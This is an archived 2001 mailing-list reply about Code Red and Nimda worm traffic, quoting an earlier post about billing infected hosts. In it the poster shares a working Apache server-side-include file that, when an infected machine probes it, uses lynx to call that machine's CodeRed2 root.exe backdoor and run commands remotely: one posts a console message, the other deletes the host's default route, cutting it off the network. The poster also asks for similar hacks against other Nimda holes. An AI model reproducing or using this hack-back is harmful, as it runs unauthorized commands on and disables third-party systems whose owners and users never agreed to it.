Hi Asgard.
I don't think you'll have any luck collecting the $1 per attack. My
approach is simpler, though likely to raise eyebrows. Input from
lawyers would be especially welcome. ;)
My assumptions are:
- any host which is attacking my has vulnerabilities which should have
been patched months ago, and
- any unpatched server is being run by administrators or companies who
don't care enough about system uptime to implement proper security.
I've created a default.ida file in my web root, and added lines to
Apache's httpd.conf to turn .ida files into SSI. My default.ida is:
<p>This host is immune to Code Red. Upgrade to a real operating system.</p>
<!--#exec cmd="/usr/local/bin/lynx -dump
http://$REMOTE_HOST/scripts/root.exe\?/c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+worm.+You+should+fix+it+before+script+kiddie+comes+along+and+take+advantage+of+it+again.+Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+\(or+wherever+your+CGI+scripts+live\),+and+install+a+bloody+virus+scanner.%22"
-->
<!--#exec cmd="/usr/local/bin/lynx -dump
http://$REMOTE_HOST/scripts/root.exe\?/c+route+delete+0.0.0.0"; -->
If all goes as planned, the effect is to put a message on the console,
and remove the default route on the host thereby protecting the Internet
and forcing someone to look at the console.
Note that this *only* catches machines which have been infected with
CodeRed2, which leaves a leftover /scripts/root.exe to play with.
If someone wants to tell me how to do this with some of the other
vulnerabilities that Nimda tries to use, I'd be grateful. :)
p
On Sat, Sep 22, 2001 at 10:42:07PM +0200, Asgard Hostmaster wrote:
>
> Hi,
>
> Thought I'd post this here as this group seems to be one of the most
> eclectic and knowledgeable around. We're all aware of the current NIMDA
> worm attacks. I recently modified my IIS 404 error page to do a netblock
> lookup on the IP of the server trying to attack ours and then email the
> netblock owner and store the information in a database. Since doing that
> a little over 24hrs ago we've received 84807 attacks from 101 separate
> servers.
>
> Considering this worm uses exploits that got massive publicity with Code
> Red, I'm wondering about liability of companies that continue to run
> vulnerable servers? I'm seriously considering automatically reviewing
> all ip addresses 24hrs after they've first attacked and and if I'm
> still being attacked giving them a further 6 or 12 hours and then I'll
> charge them $1/attack until it stops. For god's sake it's a 15 min job
> at most to actually stop the virus, though longer to fully check and
> clear the server. Perhaps this sort of action might convince some people
> to finally take server patching seriously? Thoughts folks? Any lawyers
> on the list interested in taking it up? :-)
>
> Cheers,
> david
--
Paul Chvostek <[EMAIL PROTECTED]>
Operations / Development / Abuse / Whatever vox: +1 416 598-0000
IT Canada http://www.it.ca/
